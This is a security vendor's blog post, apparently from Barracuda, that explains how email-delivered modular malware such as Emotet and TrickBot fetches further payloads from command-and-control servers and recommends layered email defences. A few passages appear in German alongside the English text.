Defend your business against evolving and sophisticated modular malware attacks.
Barracuda researchers have seen a spike in the use of modular malware since the beginning of 2019. A recent analysis of email attacks targeting Barracuda customers identified more than 150,000 unique malicious files in the first five months of the year.
Here’s a closer look at modular malware and solutions to help detect and block attacks.
Bedrohung im Fokus
Modular Malware — Cybercriminals use email to deliver modular malicious software, also known as modular malware. An ever-increasing trend, modular malware provides an architecture that is more robust, evasive and dangerous than typical document-based or web-based malware. Modular malware includes—and can selectively launch—different payloads and functionality, depending on the target and the goal of the attack.An ever-increasing trend, modular #malware provides an architecture that is more robust, evasive and dangerous than typical document-based or web-based malware. Click To Tweet
Most malware is distributed as a document attachment that is sent via spam to widely-circulated email lists. These email lists are sold, traded, aggregated, and revised as they move through the dark web.
Once an infected document is opened, either the malware is automatically installed or a heavily obfuscated macro/script is used to download and install it from an external source. Occasionally, a link or other clickable item is used, but that approach is much more common in phishing attacks than malware attacks.
With the rise of botnets executing commands provided by cybercriminals and malware written for wide-spread distribution, modularity has become the new norm. Malware authors are increasingly organized and continue to adopt and implement software-industry practices, including quality assurance and testing, to improve the success of attacks. In response to the demand to meet multiple needs with one widely-distributed malware file, modular malware has evolved to become more feature-rich and flexible.
Typically, modular malware involves a very basic initial payload. Once a foothold has been established on the system, the payload connects to a remote C2 (command and control) server for additional payloads. This enables information about the system to be sent and processed by the C2 server and for additional payloads to be chosen server-side based on that information or potentially not chosen if an analysis environment is detected. This approach has been used in banking trojans, including Emotet, TrickBot, and CoreBot, as well as in infostealers, including LokiBot and Pony.
Detecting and Blocking Modular Malware
The rapidly evolving threat environment requires a multi-layered protection strategy—one that closes the technical and human gaps—for every organization to maximize its email security performance and minimize the risk of falling victim to sophisticated attacks like modular malware.Detecting and blocking modular #malware requires a multi-layered protection strategy #cybersecurityClick To Tweet
Advanced inbound and outbound security techniques should be deployed, including malware detection, spam filters, firewalls, and sandboxing.
Bei E-Mails mit bösartigen Dokumenten im Anhang kann sowohl die statische als auch die dynamische Analyse Indikatoren dafür erkennen, dass das Dokument versucht, eine ausführbare Datei herunterzuladen und auszuführen, was kein Dokument jemals tun sollte. Die URL für die ausführbare Datei kann oft mit Hilfe von Heuristik oder Bedrohungsermittlungssystemen ausfindig gemacht werden. Eine durch statische Analyse festgestellte Verschleierung kann zudem ein Indiz dafür sein, dass ein Dokument verdächtig sein könnte.
While many malicious emails appear convincing, spam filters and related security software can pick up subtle clues and help block potentially-threatening messages and attachments from reaching email inboxes. If a user opens a malicious attachment or clicks a link to a drive-by download, an advanced network firewall capable of malware analysis provides a chance to stop the attack by flagging the executable as it tries to pass through.
In addition, encryption and DPL help secure against accidental and malicious data loss. Plus, email archiving is critical for compliance and business-continuity purposes.
Backup helps recover from data deletion, and continuity ensures that critical emails can get sent during a potential outage.
Stop attacks that can bypass the email gateway. Artificial intelligence should be used for spear-phishing protection, and DMARC validation detects and prevents email and domain spoofing.
This top layer of email defense for every business is the most critical. Make phishing simulation and training part of security-awareness training. Ensure end users are aware of new types of attacks, show them how to identify potential threats and transform them from a security liability into a line of defense by testing the effectiveness of in-the-moment training and evaluating the users most vulnerable to attacks.